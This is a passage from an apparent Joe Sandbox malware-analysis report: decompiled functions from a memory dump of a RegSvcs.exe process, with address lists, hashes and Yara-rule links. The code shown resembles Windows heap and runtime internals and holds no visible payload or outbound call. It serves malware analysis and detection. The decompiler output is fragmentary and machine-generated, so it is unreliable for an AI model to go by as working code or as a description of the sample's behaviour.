						 *0x19b7b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E0190F3E0(_t50,  *0x19b7b14, _t8 >> 3);
						_t28 =  *0x19b7b14; // 0x0
						__eflags = _t28 - 0x19b7b0c;
						if(_t28 != 0x19b7b0c) {
							L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x19b7b14 = _t50;
						_t48 = _v12;
						 *0x19b7b10 = _t9;
						goto L6;
					}
					 *0x19b7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x018fa713
0x018fa714
0x018fa717
0x018fa71d
0x018fa720
0x018fa722
0x018fa727
0x018fa74a
0x018fa754
0x018fa75e
0x018fa768
0x018fa76a
0x018fa773
0x018fa78b
0x018fa790
0x018fa792
0x018fa741
0x018fa741
0x018fa743
0x018fa749
0x018fa749
0x018fa732
0x018fa73a
0x018fa797
0x018fa79d
0x018fa7a3
0x018fa7a9
0x018fa7b6
0x018fa7bc
0x018fa7ca
0x018fa7e0
0x018fa7e2
0x018fa7e4
0x01939bf2
0x00000000
0x01939bf2
0x018fa7ed
0x018fa7f2
0x018fa800
0x018fa805
0x018fa80d
0x018fa812
0x01939c08
0x01939c08
0x018fa818
0x018fa81b
0x018fa821
0x018fa824
0x00000000
0x018fa824
0x018fa7ae
0x00000000
0x018fa7ae
0x018fa73c
0x018fa73e
0x00000000

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f903428c7b62550e7bd0ca862f94b3b0af3ede34bc8033f1bb48bbdd8bf48449
Instruction ID: 5e10e9497afdc11d978458d31ed2d8cb49cff7ca8ed4af9caf6a8912517c5d3b
Opcode Fuzzy Hash: f903428c7b62550e7bd0ca862f94b3b0af3ede34bc8033f1bb48bbdd8bf48449
Instruction Fuzzy Hash: BC31E2B1624215DBC72DCB88D9C1F65B7F9FBC5720F100A5AE249D7684D3B0AA00CF91

Uniqueness

Uniqueness Score: -1.00%

Function 018F61A0 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E018F61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E018F5E50(0x18a67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E01999D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E018CF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x018f61b3
0x018f61b5
0x018f61bd
0x018f61c3
0x018f61c7
0x018f61d2
0x018f61ff
0x018f61ff
0x018f6201
0x018f6207
0x018f6207
0x018f61d4
0x018f61d9
0x00000000
0x00000000
0x018f61df
0x018f61e2
0x00000000
0x00000000
0x018f61e6
0x018f61e8
0x018f61ee
0x018f61ee
0x018f61f9
0x0193762f
0x01937632
0x01937635
0x01937639
0x01937640
0x0193766e
0x01937675
0x00000000
0x00000000
0x01937681
0x01937689
0x0193768d
0x01937691
0x01937695
0x01937699
0x019376af
0x019376b5
0x019376b7
0x019376b7
0x019376d7
0x019376dc
0x00000000
0x019376dc
0x019376a2
0x019376a9
0x01937651
0x01937653
0x01937653
0x01937656
0x01937656
0x00000000
0x01937656
0x01937644
0x01937646
0x01937648
0x01937648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fd078d49526281744edb0eb76198866fd1b48eda4bf5f540cde66a31147b105
Instruction ID: d43ee8726fa7a8c98949c0739b262c6bb5046dd2cb9e479f716789c1973dd7b7
Opcode Fuzzy Hash: 5fd078d49526281744edb0eb76198866fd1b48eda4bf5f540cde66a31147b105
Instruction Fuzzy Hash: 2C31AFB16057018FE324CF4DC850B26BBE8FB88B04F15496DEA98D7351E770D944CB92

Uniqueness

Uniqueness Score: -1.00%

Function 018CAA16 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E018CAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x19bd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x19b7b9c; // 0x0
					_t53 = L018E4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0190B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0190F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L018D6C59(_t53, _t51, _t58) != 0) {
							_t28 = E018F5E50(0x18ac338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E018FB230(_v32, _v28, 0x18ac2d8, 1,  &_v24);
								_t28 = E018CF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x018caa25
0x018caa29
0x018caa2d
0x018caa30
0x018caa37
0x018caa3c
0x01924458
0x01924458
0x01924472
0x01924474
0x01924476
0x018caa64
0x018caa74
0x0192447c
0x01924483
0x01924492
0x018caa52
0x018caa54
0x018caa5e
0x019244a8
0x019244ad
0x019244af
0x019244b6
0x019244b6
0x019244b9
0x019244bc
0x019244cd
0x019244d3
0x019244d6
0x019244e1
0x019244e1
0x019244e6
0x019244e8
0x019244fb
0x019244fb
0x019244e8
0x00000000
0x018caa5e
0x01924476
0x018caa42
0x018caa46
0x018caa48
0x018caa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 087a9f907de5d72b14771459cdb5f3a2d21bda2528aa0b9f9619948280ed1b58
Instruction ID: 6a2a4e8c57c411bb9473ff9ef8f2ad46d0229f535519c30cddeec7d7f7ab54c4
Opcode Fuzzy Hash: 087a9f907de5d72b14771459cdb5f3a2d21bda2528aa0b9f9619948280ed1b58
Instruction Fuzzy Hash: 2C31C171A0022AAFDF159FA8CD81A7FB7B9EF54B00F01406DF905E7290E7749A11CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01908EC7 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E01908EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x19bd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E018F4E70(0x19b86e4, 0x1909490, 0, 0);
					if( *0x19b53e8 > 5 && E01908F33(0x19b53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x19b53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x19b53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x18abc46;
						_t48 = E01947B9C(0x19b53e8, 0x18abc46, _t67, 0x19b53e8, _t70,  &_v140);
					}
				}
				return E0190B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x01908ec7
0x01908ed9
0x01908edc
0x01908ee6
0x01908ee9
0x01908eee
0x01908efc
0x01908f08
0x01941349
0x01941353
0x0194135d
0x01941366
0x0194136f
0x01941375
0x0194137c
0x01941385
0x01941390
0x01941391
0x0194139c
0x0194139d
0x019413a6
0x019413ac
0x019413b2
0x019413b5
0x019413bc
0x019413bf
0x019413c2
0x019413c5
0x019413c8
0x019413cb
0x019413ce
0x019413d1
0x019413d4
0x019413d7
0x019413da
0x019413dd
0x019413e0
0x019413e3
0x019413e6
0x019413e9
0x019413f6
0x01941400
0x01941400
0x01908f08
0x01908f32

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d922ba85c4203fb55f5a81e889bf851a466b4a1b7d6f20596ee6431f2600f5c0
Instruction ID: e98ca7a8260a36708cafff5c16bc87e26c56474fb5b42e47928d5e9a6a1a8055
Opcode Fuzzy Hash: d922ba85c4203fb55f5a81e889bf851a466b4a1b7d6f20596ee6431f2600f5c0
Instruction Fuzzy Hash: 844171B1D012189FDB24CFAAD981AADFBF8BB48710F5041AEE60DA7240D7705A45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 018FE730 Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E018FE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E01909670() < 0) {
					E0191DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x19b7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L018E4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M018FE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x018fe730
0x018fe736
0x018fe738
0x018fe73d
0x018fe73e
0x018fe740
0x018fe749
0x018fe765
0x018fe76a
0x018fe76b
0x018fe76c
0x018fe76d
0x018fe76e
0x018fe76f
0x018fe775
0x018fe777
0x018fe77e
0x0193b675
0x018fe784
0x018fe784
0x018fe789
0x018fe7a8
0x018fe7ac
0x018fe807
0x018fe7ae
0x018fe7ae
0x018fe7b1
0x018fe7b4
0x018fe7b9
0x018fe7c0
0x018fe7c4
0x018fe7ca
0x018fe7cc
0x00000000
0x018fe7d3
0x018fe7d6
0x00000000
0x00000000
0x018fe7ff
0x018fe802
0x00000000
0x00000000
0x018fe7f9
0x018fe7fc
0x00000000
0x00000000
0x018fe7f3
0x018fe7f6
0x00000000
0x00000000
0x018fe7ed
0x018fe7f0
0x00000000
0x00000000
0x018fe7e7
0x018fe7ea
0x00000000
0x00000000
0x0193b685
0x0193b688
0x00000000
0x00000000
0x0193b682
0x00000000
0x00000000
0x018fe7cc
0x018fe7d9
0x018fe7dc
0x018fe7de
0x018fe7de
0x018fe7ac
0x018fe7e4
0x018fe74b
0x018fe751
0x018fe759
0x018fe761
0x018fe761

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20164c7498b55089806ebf765ef8471873105040716364376be08f6cb514560e
Instruction ID: 2c2e1f7eb32ad12d0ed32c3cd2bb5fd61c68e8051cd5d66cad4c465971a4ff30
Opcode Fuzzy Hash: 20164c7498b55089806ebf765ef8471873105040716364376be08f6cb514560e
Instruction Fuzzy Hash: BD31B175A14249EFD704CF58C841F9ABBE8FB09314F15825AFA08CB351D631ED80CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 018FBC2C Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E018FBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x19b6100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E018E2280(0xd, 0x808f1a0);
				_t41 =  *0x19b60f8; // 0x0
				if(_t41 != 0) {
					 *0x19b60f8 =  *_t41;
					 *0x19b60fc =  *0x19b60fc + 0xffff;
				}
				E018DFFB0(_t41, 0x800, 0x808f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x19b60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L018E4620(0x19b6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x19b6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x018fbc36
0x018fbc42
0x018fbc45
0x018fbc4a
0x018fbd35
0x00000000
0x00000000
0x00000000
0x00000000
0x018fbc50
0x018fbc50
0x018fbc58
0x018fbc5a
0x018fbc60
0x00000000
0x00000000
0x0193a4f2
0x0193a4f6
0x00000000
0x00000000
0x00000000
0x0193a4fc
0x018fbc79
0x018fbc7e
0x018fbc86
0x018fbd16
0x018fbd20
0x018fbd20
0x018fbc8d
0x018fbc94
0x018fbcbd
0x018fbcca
0x018fbccb
0x018fbccc
0x018fbccd
0x018fbcce
0x018fbcd4
0x018fbcea
0x018fbcee
0x018fbcf2
0x018fbd00
0x018fbd04
0x00000000
0x018fbc96
0x018fbcab
0x018fbcaf
0x018fbd2c
0x018fbd2c
0x018fbd09
0x00000000
0x018fbd09
0x018fbcb1
0x018fbcb5
0x018fbcbb
0x00000000
0x00000000
0x00000000
0x018fbcbb

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582eeb5627dce6c6d92593cd726d670c63deee53571d91ca01ab60dc57e5e9bc
Instruction ID: d5d7c385338f2798764929ad92d8ee17b1a474e98e13a4a1676635b51092a0e1
Opcode Fuzzy Hash: 582eeb5627dce6c6d92593cd726d670c63deee53571d91ca01ab60dc57e5e9bc
Instruction Fuzzy Hash: 33312032A0460A9BDB21EF9DC4C07A673B4FF18310F040078EE48DB246EB74EA058B92

Uniqueness

Uniqueness Score: -1.00%

Function 018C9100 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E018C9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x199f6e8);
				E0191D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E019988F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0191D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x19b86c0; // 0x13907b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x19b86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E018E2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E019988F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0190AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x19bb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x19b84c0;
										if(_t69 >=  *0x19b84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E01999063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E018C922A(_t82);
							_t53 = E018E7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E01998B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x19b86c0; // 0x13907b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x19b86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x19b86bc;
										_t72 = 0x19b86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E018C9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x19b86c4;
									_t72 = 0x19b86c0;
									L18:
									E018F9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x018c9100
0x018c9100
0x018c9100
0x018c9100
0x018c9102
0x018c9107
0x018c910c
0x018c9110
0x018c9115
0x018c9136
0x018c9143
0x019237e4
0x019237e4
0x018c9149
0x018c914e
0x018c914e
0x018c9117
0x018c911d
0x00000000
0x00000000
0x018c911f
0x018c9125
0x00000000
0x018c9151
0x018c9158
0x018c915d
0x018c9161
0x018c9168
0x01923715
0x00000000
0x018c916e
0x018c916e
0x018c9175
0x018c9177
0x018c917e
0x018c917f
0x018c9182
0x018c9182
0x018c9187
0x018c9187
0x018c918a
0x018c918d
0x018c918f
0x018c9192
0x018c9195
0x018c9198
0x018c9198
0x018c9198
0x018c919a
0x00000000
0x00000000
0x0192371f
0x01923721
0x01923727
0x0192372f
0x01923733
0x01923735
0x01923738
0x0192373b
0x0192373d
0x01923740
0x00000000
0x00000000
0x01923746
0x01923749
0x00000000
0x00000000
0x0192374f
0x01923751
0x00000000
0x00000000
0x01923757
0x01923759
0x0192375c
0x0192375c
0x0192375e
0x0192375e
0x01923761
0x01923764
0x00000000
0x00000000
0x01923766
0x01923768
0x019237a3
0x019237a3
0x019237a5
0x019237a7
0x019237ad
0x019237b0
0x019237b2
0x019237bc
0x019237c2
0x019237c2
0x019237b2
0x018c9187
0x018c9187
0x018c918a
0x018c918d
0x018c918f
0x018c9192
0x018c9195
0x00000000
0x018c9195
0x00000000
0x018c9187
0x0192376a
0x0192376a
0x0192376c
0x0192376c
0x0192376f
0x01923775
0x00000000
0x00000000
0x01923777
0x01923779
0x00000000
0x00000000
0x01923782
0x01923787
0x01923789
0x01923790
0x01923790
0x0192378b
